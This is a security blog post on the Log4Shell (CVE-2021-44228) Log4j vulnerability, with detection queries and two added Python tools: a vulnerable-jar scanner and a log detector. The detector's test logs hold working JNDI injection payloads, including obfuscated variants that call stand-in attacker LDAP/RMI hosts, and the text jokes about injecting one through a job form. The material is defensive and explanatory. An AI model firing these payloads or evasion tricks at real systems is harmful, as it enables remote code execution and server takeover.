Apache Log4j is a fast, reliable and flexible Java-based logging framework. A wide range of frameworks, applications and tools leverage Log4j, such as Apache Struts2, Apache Solr, Apache Flink, Apache Druid, iCloud, Steam and Minecraft.
The worst part is that not everyone knows whether Log4j is even present in their environment. How many of you really knew Elasticsearch ships with Log4j? Any organization running Java applications, or appliances, that bundle Log4j 2.x below 2.15.0 is likely vulnerable.
CVE-2021-44228 (Log4Shell) is an unauthenticated Remote Code Execution (RCE) vulnerability, exploited in the wild as a 0-day, that lets an attacker take over a system using Apache Log4j 2.0-beta9 through 2.14.1. If successfully exploited, the attacker runs arbitrary code on the affected server, leading to a full takeover of the system.
To trigger this vulnerability, all the attacker needs to do is get the application to log a specially crafted string. Any attacker-controlled input that ends up anywhere in a logged message will do. Guess what gets logged? HTTP headers such as User-Agent, usernames, email addresses and URLs.
Put simply, if you fill in a form with the name
${jndi:ldap://127.0.0.1:1389/a}
you own the application. Try applying for a job at a firm running Log4j with the aforementioned name and the least you could get is a full-time job XD. Have you heard of Secret Santa? Apparently this is the perfect gift from Santa to the bad guys.
Researchers traced the bug to an unsafe JNDI lookup: when Log4j sees the ${...} syntax in a log message it resolves the lookup, which for ${jndi:ldap://...} means a network request to the attacker's LDAP server, and the response can point the JVM at a remote class that is then loaded and executed (a Java deserialization-style failure). The impact is reduced if the JVM refuses to load remote classes via LDAP, as newer Java releases do by default, but that is only a partial mitigation. For insights about how the attack works, visit this.
If you're using a Java version below 1.8 and Log4j >= 2.10
Apache has released Log4j 2.15.0 to address the maximum-severity (CVSS 10.0) CVE-2021-44228 RCE vulnerability; upgrading every vulnerable instance is the recommended fix.
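Upgrading presupposes that you know which log4j-core jars are on disk, and the two indicators that matter per jar are the artifact version and whether the JndiLookup class is still inside it (deleting that class from the jar was the published hot-fix for deployments that could not upgrade immediately). The following is an added example, not code from the original post and not an Apache tool: it builds three stand-in log4j-core jars plus one unrelated jar in a temporary directory (constructed test data carrying only the two indicators), then walks the directory and classifies each one. The status names and the FIXED_VERSION floor are this example's own choices; 2.15.0 is the release the post asks for, and later releases superseded it, so treat it as a minimum rather than the final word.

```python
"""Find log4j-core jars on disk and classify them for CVE-2021-44228.

Added example for this post, not the page's or Apache's code. The jars built
by make_stub_jar() are constructed test data: real jars carry the same two
indicators (Maven pom.properties with the version, and JndiLookup.class).
"""
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)  # the release the post says to upgrade to (a floor, not a ceiling)


def parse_version(text: str):
    """'2.14.1' -> (2, 14, 1); pre-release suffixes such as '-beta9' are dropped."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return tuple(int(x or 0) for x in m.groups())


def log4j_core_version(jar: zipfile.ZipFile):
    """Read the artifact version from the Maven pom.properties, if the jar has one."""
    if POM_PROPERTIES not in jar.namelist():
        return None
    for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return parse_version(line.split("=", 1)[1].strip())
    return None


def assess_jar(path: str) -> dict:
    """Classify one jar: vulnerable, mitigated (JndiLookup removed), fixed, or not log4j-core."""
    with zipfile.ZipFile(path) as jar:
        version = log4j_core_version(jar)
        has_jndi = JNDI_LOOKUP_CLASS in jar.namelist()
    if version is None and not has_jndi:
        status = "not-log4j-core"
    elif version is not None and version >= FIXED_VERSION:
        status = "fixed"
    elif has_jndi:
        status = "vulnerable"  # also covers an unknown version that still ships JndiLookup
    else:
        status = "mitigated"   # JndiLookup.class was stripped from the jar (the hot-fix)
    return {"path": path, "version": version, "jndi_lookup_present": has_jndi, "status": status}


def scan_tree(root: str):
    """Walk a directory and assess every top-level .jar (jars nested in WAR/EAR files are not opened)."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(".jar"):
                results.append(assess_jar(os.path.join(dirpath, name)))
    return results


def make_stub_jar(path: str, version: str, include_jndi_lookup: bool) -> None:
    """Write a minimal jar holding only the two indicators (constructed test data)."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(POM_PROPERTIES,
                     f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only


def demo() -> dict:
    """Build the stub jars in a temp dir, scan it, and return {file name: status}."""
    with tempfile.TemporaryDirectory() as root:
        make_stub_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1", True)
        make_stub_jar(os.path.join(root, "log4j-core-2.14.1-hotfix.jar"), "2.14.1", False)
        make_stub_jar(os.path.join(root, "log4j-core-2.15.0.jar"), "2.15.0", True)
        with zipfile.ZipFile(os.path.join(root, "other-lib.jar"), "w") as jar:
            jar.writestr("com/example/Foo.class", b"\xca\xfe\xba\xbe")
        return {os.path.basename(r["path"]): r["status"] for r in scan_tree(root)}


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:15} {name}")
```

Point scan_tree() at a real application directory to use it for inventory; the hot-fixed jar is reported as mitigated rather than vulnerable because the lookup class that performs the JNDI call is gone, while an unknown version that still contains JndiLookup.class is deliberately reported as vulnerable.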
Regex (case-insensitive; catches plain and URL-encoded forms of ${jndi:):
/(\$|\%24)\s*(\{|%7b)\s*jndi\s*(\:|\%3a)/i
ELK
index=bro AND http_uri:(\/\$\{jndi\:*)
Network detection using the ET Open ruleset for Suricata 5.0 (the command prints the last ten rules in the exploit rules file):
curl -s https://rules.emergingthreatspro.com/open/suricata-5.0/rules/emerging-exploit.rules | tail -n 10
Splunk (all indexes):
index=* ${jndi:*}
All of these match the literal ${jndi: prefix; obfuscated variants such as ${${lower:j}ndi:...} or double URL-encoding need a broader pattern or a decoding step first.
For YARA rules, visit log4j_rce_detection.
Try hunting for these in your environment.
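The search strings above all key on the literal ${jndi: prefix that the first wave of scanning used, but attackers quickly moved to nested lookups (${${lower:j}ndi:..., ${${::-j}ndi:...}) and double URL-encoding, which those patterns miss. The following is an added example, not code from the original post or from the Log4j project: it runs the post's regex over a handful of constructed access-log lines (documentation IP ranges), then runs a normalizing detector that undoes URL encoding and the common nested-lookup tricks before matching. The function names and the sample lines are this example's own.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in web-server access logs.

Added example for this post, not code from the original page or from the
Apache Log4j project. SAMPLE_LOG is constructed test data using the
documentation IP ranges 203.0.113.0/24 and 198.51.100.0/24.
"""
import re
from urllib.parse import unquote

# The post's regex: catches "${jndi:" in plain or single URL-encoded form.
PAGE_REGEX = re.compile(r"(\$|\%24)\s*(\{|%7b)\s*jndi\s*(\:|\%3a)", re.IGNORECASE)

# What we really want to find once obfuscation has been undone.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Nested-lookup tricks used to slip past a plain "${jndi:" match:
#   ${lower:j} / ${upper:J}      -> the literal character
#   ${::-j} / ${env:NOPE:-j}     -> the default value after ":-"
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")

SAMPLE_LOG = "\n".join([
    # 1: plain payload in the User-Agent
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    # 2: URL-encoded payload in the query string
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    # 3: ${lower:} nesting hides both the "j" and the "l"
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a}"',
    # 4: ${::-x} default-value nesting spells out "jndi", RMI instead of LDAP
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/a}"',
    # 5: benign request that merely mentions jndi
    '198.51.100.2 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
])


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and inner lookups, repeating until the string stops changing."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)  # %24%7B -> ${ ; a second round handles double encoding
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a (possibly obfuscated) ${jndi: lookup."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(log_text: str, regex=None):
    """Return 1-based numbers of the lines flagged by `regex`; with no regex, use the normalizing detector."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if regex is not None:
            flagged = regex.search(line) is not None
        else:
            flagged = is_log4shell_probe(line)
        if flagged:
            hits.append(number)
    return hits


if __name__ == "__main__":
    print("post's regex flags lines:", scan(SAMPLE_LOG, PAGE_REGEX))
    print("normalizing detector flags:", scan(SAMPLE_LOG))
```

The post's regex flags lines 1 and 2 only; the normalizing detector flags 1 through 4 and leaves the benign line 5 alone. The normalization is heuristic: Log4j has more lookups (env, sys, date and others) that an attacker can combine, so a miss is absence of evidence, not evidence of absence, which is why the asset-side check (which jars are on disk) matters as much as log hunting.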
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228
Also published here.